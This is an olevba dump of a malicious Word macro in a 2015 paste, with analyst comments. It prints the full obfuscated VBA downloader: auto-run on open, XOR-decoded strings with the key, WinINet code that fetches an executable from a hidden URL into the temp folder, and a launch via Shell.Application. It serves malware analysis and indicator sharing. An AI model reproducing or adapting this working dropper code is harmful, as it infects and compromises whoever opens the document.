
Malicious Word macro

dynamoo Apr 17th, 2015 244 Never
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIHB- cswift~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: cswift~1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: cswift~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub DWIGHT(FELIX As Long)
      ' Indirection hop: FELIX is never read; the only effect is the call to SHAUN.
  17. SHAUN
  18. End Sub
  19.  
  20. Sub autoopen()
      ' Entry point: olevba flags AutoOpen as running when the Word document is opened.
      ' Call chain visible in this dump:
      '   autoopen -> DWIGHT -> SHAUN -> ALFONSO -> CAMERON -> CARLTON -> DERRICK
      ' The literal 333 is discarded by DWIGHT.
  21. DWIGHT 333
  22. End Sub
  23. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  24. ANALYSIS:
  25. +----------+----------+---------------------------------------+
  26. | Type     | Keyword  | Description                           |
  27. +----------+----------+---------------------------------------+
  28. | AutoExec | AutoOpen | Runs when the Word document is opened |
  29. +----------+----------+---------------------------------------+
  30. -------------------------------------------------------------------------------
  31. VBA MACRO OIDL8.bas
  32. in file: cswift~1.doc - OLE stream: u'Macros/VBA/OIDL8'
  33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  34.  
  35. Public Function JEREMIAH(ByRef JULIUS As String, ByRef DONNIE As Long) As Integer
      ' Key-byte selector for the string decoder (ALBERT).
      ' Returns the character code of JULIUS at 1-based position
      ' (DONNIE Mod Len(JULIUS)) + 1; MARION wraps Mid$ and ANTONIO wraps Len.
      ' The literal 33 is a throwaway argument (MARION only adds 50 to its local copy).
  36. JEREMIAH = Asc(MARION(33, JULIUS, _
  37.         ((DONNIE Mod ANTONIO(JULIUS)) + 1), 1))
  38. End Function
  39. Public Function SHANNON() As Object
      ' Creates a COM object whose ProgID is hidden behind ALBERT(JULIO, LANCE).
      ' Decoding LANCE with key JULIO by hand gives "Scripting.FileSystemObject",
      ' which is consistent with the GetSpecialFolder / FileExists / DeleteFile
      ' calls made on the returned object elsewhere in the dump.
  40. Dim TREVOR As String
  41. TREVOR = ALBERT(JULIO, LANCE)
  42. Set SHANNON = CreateObject(TREVOR)
  43. End Function
  44.  
  45.  
  46.  
  47.  
  48. Public Function DERRICK(ByRef OLIVER As Object, ByRef HOMER As Object) As Boolean
      ' Orchestrates the drop: build target path, remove any old copy, download, launch.
      ' OLIVER is overwritten immediately (caller CARLTON passes an unset object);
      ' HOMER is the object CARLTON obtained from SHANNON().
  49.  
  50. Dim GERARD As Long
      ' OLIVER = SHANNON().GetSpecialFolder(2) via HUBERT (the temporary folder).
  51. Set OLIVER = HUBERT(SHANNON)
  52.  
  53. Dim HECTOR
  54.  
  55. Dim KENNY As String
      ' KENNY = decoded DUANE; by hand this decodes to "\grant8i.exe".
      ' The literal 2048 is a junk argument (HERMAN doubles it and ignores it).
  56. KENNY = HERMAN(2048, JULIO, DUANE)
  57.  
      ' Junk loop: no effect on the result, padding against static analysis.
  58. For GERARD = 292 To 293
  59. GERARD = GERARD * 1
  60. Next GERARD
      ' Full drop path. NOTE(review): OLIVER is an object here, so the concatenation
      ' presumably relies on its default property yielding the folder path - confirm.
  61. HECTOR = OLIVER & KENNY
  62.  
  63.  
      ' Delete a previous copy of the dropped file if one exists.
  64. If SIDNEY(HOMER, HECTOR) Then
  65. HOMER. _
  66. DeleteFile HECTOR
  67. End If
      ' WILBUR is called for its side effect (download to HECTOR); the result is ignored.
  68. If WILBUR(3, HECTOR) Then
  69. End If
      ' Existence re-check with an empty body: no effect.
  70. If SIDNEY(HOMER, HECTOR) Then
  71. End If
  72.  
  73.  
      ' Hand the dropped file to RICARDO, which opens it through a second COM object.
  74. DERRICK = RICARDO(OLIVER, KENNY, 7.2)
  75.  
  76. End Function
  77.  
  78. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  79. ANALYSIS:
  80. +------------+--------------+--------------------------+
  81. | Type       | Keyword      | Description              |
  82. +------------+--------------+--------------------------+
  83. | Suspicious | CreateObject | May create an OLE object |
  84. +------------+--------------+--------------------------+
  85. -------------------------------------------------------------------------------
  86. VBA MACRO PIDLE0.bas
  87. in file: cswift~1.doc - OLE stream: u'Macros/VBA/PIDLE0'
  88. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  89. Public Function HUBERT(ByRef NICHOLAS As Object) As Object
      ' Returns NICHOLAS.GetSpecialFolder(2). For a Scripting.FileSystemObject,
      ' the value 2 is TemporaryFolder, i.e. the user's temp directory.
  90. Set HUBERT = NICHOLAS.GetSpecialFolder(2)
  91. End Function
  92. Sub ALFONSO(CALEIGH As Double)
      ' Indirection hop: CALEIGH is unused and "BRUCE" is ignored by CAMERON.
  93.  
  94. CAMERON ("BRUCE")
  95. End Sub
  96.  
  97.  
  98.  
  99. Public Function RICARDO(ByRef OLIVER As Object, ByRef KENNY As String, RUBEN As Double) As Boolean
       ' Launch step. Creates the COM object named by ALBERT(JULIO, CECIL) - by hand
       ' this decodes to "Shell.Application" - and calls its Open method on the
       ' dropped path (OLIVER & KENNY). RUBEN is unused, and RICARDO is never
       ' assigned, so the function returns the default Boolean (False).
       ' SHANE is not declared in this block.
  100.  
  101. Set SHANE = CreateObject _
  102. (ALBERT _
  103. (JULIO, CECIL))
  104. Dim BRETT As Integer
  105. BRETT = SHANE.Open(OLIVER & KENNY)
  106. End Function
  107.  
  108. Public Function ALBERT(JULIUS As String, ADAM As String) As String
       ' String decoder used for every hidden constant in this document.
       '   JULIUS - key string (callers pass JULIO)
       '   ADAM   - hex-encoded ciphertext, two hex digits per output character
       ' For i = 1 .. Len(ADAM)/2:
       '   out(i) = Chr( hexbyte(ADAM, i) Xor Asc(Mid(JULIUS, (i Mod Len(JULIUS)) + 1, 1)) )
       ' The key index starts at the SECOND key character, because i starts at 1.
       ' This is why olevba reports Hex strings, Chr and Xor but no plain-text URL.
  109.    
  110.     Dim PERRY As Integer
  111.     Dim SERGIO As Integer
  112.    
  113.    
  114.     Dim WAYNE As Double
       ' Junk loop: WAYNE only takes the values 42 and 43, so the End never fires.
  115. For WAYNE = 42 To 43
  116. If WAYNE = 32 Then End
  117. Next WAYNE
  118.    
  119.     Dim DONNIE As Long
  120.     Dim STEVE As String
  121.     For DONNIE = 1 _
  122.     To _
  123.     ( _
  124.     ANTONIO _
  125.     (ADAM) _
  126.     / 2)
       ' PERRY = ciphertext byte, SERGIO = key byte, PHILIP = Chr(PERRY Xor SERGIO).
  127.         PERRY = CHRIS(ADAM, DONNIE)
  128.         SERGIO = JEREMIAH(JULIUS, DONNIE)
  129.         STEVE = STEVE + PHILIP(PERRY, SERGIO)
  130.     Next DONNIE
  131.    ALBERT = STEVE
  132. End Function
  133.  
  134. Public Function CAMERON(REX As String)
       ' Indirection hop: REX is unused. The arithmetic on NEAL only produces a
       ' throwaway Double for CARLTON, which does not use it for anything observable.
  135. Dim NEAL As Double
  136. NEAL = 5.5
  137. CARLTON NEAL * 8.8
  138. NEAL = NEAL + 1
  139. End Function
  140. Sub SHAUN()
       ' Indirection hop between DWIGHT and ALFONSO. MATT is declared but never used.
  141.         Dim MATT As Long
  142.  
  143.     Dim LYLE As Long
       ' Junk loop: LYLE becomes 12 on the first pass and the loop exits.
  144. For LYLE = 2 To 4
  145. LYLE = LYLE * 6
  146. Next LYLE
  147.  
  148. ALFONSO (4.4)
  149.  
  150. End Sub
  151.  
  152.  
  153.  
  154.  
  155.  
  156. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  157. ANALYSIS:
  158. +------------+--------------+--------------------------+
  159. | Type       | Keyword      | Description              |
  160. +------------+--------------+--------------------------+
  161. | Suspicious | CreateObject | May create an OLE object |
  162. | Suspicious | Open         | May open a file          |
  163. +------------+--------------+--------------------------+
  164. -------------------------------------------------------------------------------
  165. VBA MACRO IDL4.bas
  166. in file: cswift~1.doc - OLE stream: u'Macros/VBA/IDL4'
  167. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  168.  
  169.  
  170.  
  171. Public Function CARLTON(ERNESTO As Double)
       ' Obtains the COM object from SHANNON() and passes it to DERRICK, which does
       ' the download-and-launch work. ERNESTO and the three FREDRICK loops are
       ' filler with no effect on the outcome.
  172.  
       ' LUTHER is never Set here; DERRICK assigns its own value to that parameter.
  173. Dim LUTHER As Object
  174.  
  175.  
  176.     Dim FREDRICK As Long
       ' Junk loop.
  177. For FREDRICK = 814 To 815
  178. FREDRICK = FREDRICK + 35
  179. Next FREDRICK
  180.    
  181.  
  182. Dim WENDELL  As Object
  183.  
  184.  
       ' Junk loop.
  185. For FREDRICK = 710 To 711
  186. FREDRICK = FREDRICK + 5
  187. Next FREDRICK
  188.    
  189.  
       ' WENDELL = the object created from the decoded LANCE ProgID (see SHANNON).
  190. Set WENDELL _
  191. = SHANNON()
  192. ERNESTO = ERNESTO + 7
       ' Junk loop.
  193. For FREDRICK = 232 To 233
  194. FREDRICK = FREDRICK + 28
  195. Next FREDRICK
  196. Dim LEWIS As Boolean
  197.  
       ' Real work happens here; LEWIS is not used afterwards.
  198. LEWIS = DERRICK(LUTHER, WENDELL)
  199. End Function
  200.  
  201.  
  202. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  203. ANALYSIS:
  204. No suspicious keyword or IOC found.
  205. -------------------------------------------------------------------------------
  206. VBA MACRO FILE6.bas
  207. in file: cswift~1.doc - OLE stream: u'Macros/VBA/FILE6'
  208. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  209.  
  210. Option Explicit
  211.  
  212. Public Const CECIL = "1F292E292B7C003E242E25222A312E3D2F" ' hex ciphertext; hand-decoded with key JULIO via ALBERT: "Shell.Application" (ProgID used by RICARDO)
  213. Public Const DUANE = "10263924292679277A273424" ' hand-decoded: "\grant8i.exe" (file name appended to the temp folder in DERRICK)
  214. Public Const LONNIE = "24353F357D7D6E213B2E2D26223322216F2D3B2F63737F6A70617260313A29" ' hand-decoded (defanged): hxxp://oolagives[.]com/24/733.exe (URL opened in DARYL) - re-derive before using as an indicator
  215. Public Const LANCE = "1F22392C37262820336C0A282720142B323A312F032321202426" ' hand-decoded: "Scripting.FileSystemObject" (ProgID used by SHANNON)
  216. Public Const JULIO = "BLAKEGRANT" ' XOR key passed to ALBERT/HERMAN for all four strings above
  217.  
  218. Private Const ORLANDO = 4000 ' size of the fixed-length read buffer MARK in WILBUR
  219. Private Const KURT As String = "NELSON" ' first argument to EDUARDO (InternetOpenA) in TERRANCE, i.e. the agent string
  220. Private Const ALLAN = 1 ' second argument to EDUARDO (InternetOpenA) in TERRANCE, i.e. the access type
  221. Private Const CLAYTON = &H4000000 ' flags argument to ALFREDO (InternetOpenUrlA) in DARYL; 0x04000000 is INTERNET_FLAG_NO_CACHE_WRITE in wininet.h
  222.  
  223.  
  224.  
  225. Public Function PHILIP(ByRef PERRY As Integer, ByRef SERGIO As Integer) As String
       ' One decoder step: the character whose code is PERRY Xor SERGIO.
  226.     PHILIP = Chr(PERRY Xor SERGIO)
  227. End Function
  228.  
  229. Public Function CHRIS(ByRef ADAM As String, ByRef DONNIE As Long) As Integer
       ' Returns the DONNIE-th byte of the hex string ADAM: takes two characters
       ' starting at position 2*DONNIE-1 (JOHNNY) and parses them as "&Hxx".
       ' The literal 32 is a junk argument to MARION.
  230.  CHRIS = Val("&H" & (MARION(32, ADAM, JOHNNY(DONNIE), 2)))
  231. End Function
  232. Public Function JOHNNY(ByRef DONNIE As Long) As Long
       ' Maps a 1-based byte index to the 1-based offset of its first hex digit.
  233.  JOHNNY = (2 * DONNIE) - 1
  234. End Function
  235.  
  236. Public Function WILBUR(LORENZO As Long, ByVal OMAR As String) As Boolean
       ' Downloader: opens a WinINet session (TERRANCE), opens the hidden URL (DARYL),
       ' reads the response in ORLANDO-sized chunks (WALLACE = InternetReadFile) and
       ' writes the accumulated data to the path OMAR.
       ' Returns True when the accumulated length is non-zero. LORENZO is unused.
  237.     #If VBA7 _
  238.     And Win64 Then
  239.         Dim LEONARD As LongPtr, STANLEY As LongPtr
  240.     #Else
  241.         Dim LEONARD As Long, STANLEY As Long
  242.     #End If
  243.     Dim FRANK As Long
  244.     Dim MARK As String * ORLANDO, CHARLES As String
  245.     Dim MIKE As Integer, NATHAN As Double
       ' LEONARD = session handle from InternetOpenA; 0 means the call failed.
  246.     LEONARD = TERRANCE
  247.     If LEONARD = 0 Then
  248.         Exit Function
  249.     End If
  250.     Dim STEPHEN As Boolean
  251.    
       ' DARYL stores the InternetOpenUrlA handle in STANLEY; its Boolean result is ignored.
  252.     If DARYL(STANLEY, LEONARD) Then
  253.     End If
  254.     If STANLEY = 0 Then
  255.         NATHAN = 0
  256.     Else
       ' First read: MARK is the fixed-length buffer, FRANK receives the byte count.
       ' Note that the whole buffer is copied here, not just the first FRANK characters.
  257.         WALLACE STANLEY, MARK, ORLANDO, FRANK
  258.         CHARLES = MARK
  259.           Dim RAYMOND As Long
       ' Junk loop: RAYMOND is 321..322, so the End never fires.
  260. For RAYMOND = 321 To 322
  261. If RAYMOND = 1232 Then End
  262. Next RAYMOND
       ' Keep reading until InternetReadFile reports 0 bytes.
  263.         Do While FRANK <> 0
  264.             WALLACE STANLEY, MARK, ORLANDO, FRANK
  265.                     CHARLES = CHARLES + Mid(MARK, 1, FRANK)
  266.         Loop
       ' NATHAN = total length; MIKE = free file number (DANNY ignores "JERRY").
  267.              NATHAN = ANTONIO(CHARLES): _
  268.              MIKE = DANNY("JERRY")
       ' Write the payload to disk: this is the Open/Binary/Write/Put set olevba flags.
  269.         Open OMAR _
  270.             For Binary Access Write _
  271.         Lock Write _
  272.         As #MIKE
  273.         Put #MIKE, _
  274.                 , CHARLES
  275.         Dim DENNIS As Double
       ' Junk loop.
  276.             For DENNIS = 42 To 43
  277.     If DENNIS = 437 Then End
  278. Next DENNIS
  279.         Close #MIKE
  280.     End If
       ' EVERETT = InternetCloseHandle, applied to the URL handle and the session handle.
  281.     EVERETT STANLEY
  282.     EVERETT LEONARD
  283.     CHARLES = ""
  284.     If NATHAN Then
  285.         WILBUR = True
  286.     End If
  287. End Function
  288.  
  289.  
  290. Public Function ANTONIO(SALVADOR As String) As Long
       ' Renamed wrapper around Len, so the built-in name does not appear at call sites.
  291. ANTONIO = Len(SALVADOR)
  292. End Function
  293. Public Function DANNY(SALVADOR As String) As Integer
       ' Renamed wrapper around FreeFile; the SALVADOR argument is ignored.
  294.     DANNY = FreeFile
  295. End Function
  296.  
  297.  
  298.  
  299.  
  300. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  301. ANALYSIS:
  302. +------------+-------------+-----------------------------------------+
  303. | Type       | Keyword     | Description                             |
  304. +------------+-------------+-----------------------------------------+
  305. | Suspicious | Open        | May open a file                         |
  306. | Suspicious | Write       | May write to a file (if combined with   |
  307. |            |             | Open)                                   |
  308. | Suspicious | Put         | May write to a file (if combined with   |
  309. |            |             | Open)                                   |
  310. | Suspicious | Chr         | May attempt to obfuscate specific       |
  311. |            |             | strings                                 |
  312. | Suspicious | Xor         | May attempt to obfuscate specific       |
  313. |            |             | strings                                 |
  314. | Suspicious | Binary      | May read or write a binary file (if     |
  315. |            |             | combined with Open)                     |
  316. | Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
  317. |            |             | be used to obfuscate strings (option    |
  318. |            |             | --decode to see all)                    |
  319. +------------+-------------+-----------------------------------------+
  320. -------------------------------------------------------------------------------
  321. VBA MACRO IDL3.bas
  322. in file: cswift~1.doc - OLE stream: u'Macros/VBA/IDL3'
  323. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  324.  
  325.  
  326.  
  327.  
  328. Public Const JAMES = "JOHN" ' not referenced anywhere in the dumped modules
  329.  
       ' WinINet imports under renamed aliases (the "Lib" and "wininet.dll" hits in the
       ' olevba table). The 64-bit branch is split across continuation lines.
       '   EVERETT = InternetCloseHandle   EDUARDO = InternetOpenA
       '   WALLACE = InternetReadFile      ALFREDO = InternetOpenUrlA
       ' Both branches declare the same four functions; only the handle types differ
       ' (LongPtr vs Long).
  330. #If VBA7 And Win64 Then
  331. Public _
  332. Declare _
  333. PtrSafe _
  334. Function _
  335. EVERETT Lib _
  336. "wininet.dll" Alias "InternetCloseHandle" (ByRef RICHARD As LongPtr) As Long
  337. Public _
  338. Declare _
  339. PtrSafe _
  340. Function _
  341. EDUARDO Lib _
  342. "wininet.dll" Alias "InternetOpenA" (ByVal CHARLES As String, ByVal OMARPH As Long, ByVal THOMAS As String, ByVal CHRISTOPHER As String, ByVal DANIEL As Long) As LongPtr
  343. Public _
  344. Declare _
  345. PtrSafe _
  346. Function _
  347. WALLACE Lib _
  348. "wininet.dll" Alias "InternetReadFile" (ByVal PAUL As LongPtr, ByVal MARK As String, ByVal DONALD As Long, GEORGE As Long) As Integer
  349. Public _
  350. Declare _
  351. PtrSafe _
  352. Function _
  353. ALFREDO Lib _
  354. "wininet.dll" Alias "InternetOpenUrlA" (ByVal KENNETH As LongPtr, ByVal STEVEN As String, ByVal EDWARD As String, ByVal BRIAN As Long, ByVal RONALD As Long, ByVal ANTHONY As Long) As LongPtr
  355. #Else
  356. Public Declare Function EVERETT Lib "wininet.dll" _
  357. Alias "InternetCloseHandle" (ByRef RICHARD As Long) As Long
  358. Public Declare Function EDUARDO Lib "wininet.dll" _
  359. Alias "InternetOpenA" (ByVal CHARLES As String, ByVal OMARPH As Long, ByVal THOMAS As String, ByVal CHRISTOPHER As String, ByVal DANIEL As Long) As Long
  360. Public Declare Function WALLACE Lib "wininet.dll" _
  361. Alias "InternetReadFile" (ByVal PAUL As Long, ByVal MARK As String, ByVal DONALD As Long, GEORGE As Long) As Integer
  362. Public Declare Function ALFREDO Lib "wininet.dll" _
  363. Alias "InternetOpenUrlA" (ByVal KENNETH As Long, ByVal STEVEN As String, ByVal EDWARD As String, ByVal BRIAN As Long, ByVal RONALD As Long, ByVal ANTHONY As Long) As Long
  364. #End If
  365.  
  366. Public Function SIDNEY(ByRef JULIAN As Object, ByVal ISAAC As String) As Boolean
       ' Wrapper around JULIAN.FileExists(ISAAC); returns its result as True/False.
  367. If JULIAN.FileExists(ISAAC) Then
  368. SIDNEY = True
  369. Else
  370. SIDNEY = False
  371. End If
  372. End Function
  373. #If VBA7 _
  374.     And Win64 Then
  375.        Public Function DARYL(ByRef CLIFTON As LongPtr, MORRIS As LongPtr) As Boolean
  376.     #Else
  377.        Public Function DARYL(ByRef CLIFTON As Long, MORRIS As Long) As Boolean
  378.     #End If
       ' Opens the hidden URL on the session handle MORRIS and returns the resulting
       ' handle through CLIFTON. Always returns True, even if the open failed;
       ' the caller (WILBUR) checks CLIFTON for 0 instead. HOWARD is unused.
  379. Dim WILLARD As String
  380. Dim HOWARD As Long
       ' WILLARD = decoded LONNIE, i.e. the download URL (21 is a junk argument).
  381.     WILLARD _
  382.     = HERMAN(21, JULIO, LONNIE)
  383.    
       ' ALFREDO = InternetOpenUrlA(session, url, headers, headersLength, flags, context).
       ' NOTE(review): CLAYTON is declared Private in the FILE6 module; whether it
       ' resolves to &H4000000 here or to an empty value depends on module scoping
       ' that this dump cannot confirm - check in a sandbox.
  384.                 CLIFTON _
  385.     = ALFREDO _
  386.     ( _
  387.     MORRIS, _
  388.     WILLARD, vbNullString, _
  389.     0, _
  390.     CLAYTON, 0)
  391.     DARYL = True
  392. End Function
  393.  
  394.  
  395. Public Function MARION(TRACY As Long, ByRef SALVADOR As String, ByRef PERRY As Integer, ByRef SERGIO As Integer) As String
       ' Renamed wrapper around Mid$(SALVADOR, PERRY, SERGIO).
       ' TRACY is a decoy parameter: it is incremented after the result is set and
       ' never influences the return value.
  396.     MARION = Mid$(SALVADOR, PERRY, SERGIO)
  397.     TRACY = TRACY + 50
  398. End Function
  399. #If VBA7 _
  400.     And Win64 Then
  401. Public Function TERRANCE() As LongPtr
  402.  #Else
  403. Public Function TERRANCE() As Long
  404.  
  405.  #End If
  406.  
       ' Opens the WinINet session: EDUARDO = InternetOpenA(agent, accessType, proxy,
       ' proxyBypass, flags). The returned handle is 0 on failure (checked in WILBUR).
       ' NOTE(review): KURT ("NELSON") and ALLAN (1) are Private constants of the FILE6
       ' module, while this function sits in IDL3. If they are out of scope here, the
       ' agent string and access type passed at run time differ from those literals.
       ' Confirm against a sandbox capture before building a User-Agent detection.
  407.  TERRANCE = EDUARDO(KURT, ALLAN, vbNullString, vbNullString, 0)
  408. End Function
  409.  
  410. Public Function HERMAN(FREDDIE As Long, TERRENCE As String, ENRIQUE As String) As String
       ' Second entry point to the decoder: returns ALBERT(TERRENCE, ENRIQUE), i.e.
       ' ENRIQUE (hex ciphertext) XOR-decoded with key TERRENCE.
       ' FREDDIE is a decoy: it is doubled and never used.
  411. FREDDIE = FREDDIE * 2
  412. HERMAN = ALBERT(TERRENCE, ENRIQUE)
  413.    
  414. End Function
  415.  
  416.  
  417.  
  418.  
  419.  
  420.  
  421. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  422. ANALYSIS:
  423. +------------+----------------+-----------------------------------------+
  424. | Type       | Keyword        | Description                             |
  425. +------------+----------------+-----------------------------------------+
  426. | Suspicious | Lib            | May run code from a DLL                 |
  427. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  428. |            |                | may be used to obfuscate strings        |
  429. |            |                | (option --decode to see all)            |
  430. | IOC        | wininet.dll    | Executable file name                    |
  431. +------------+----------------+-----------------------------------------+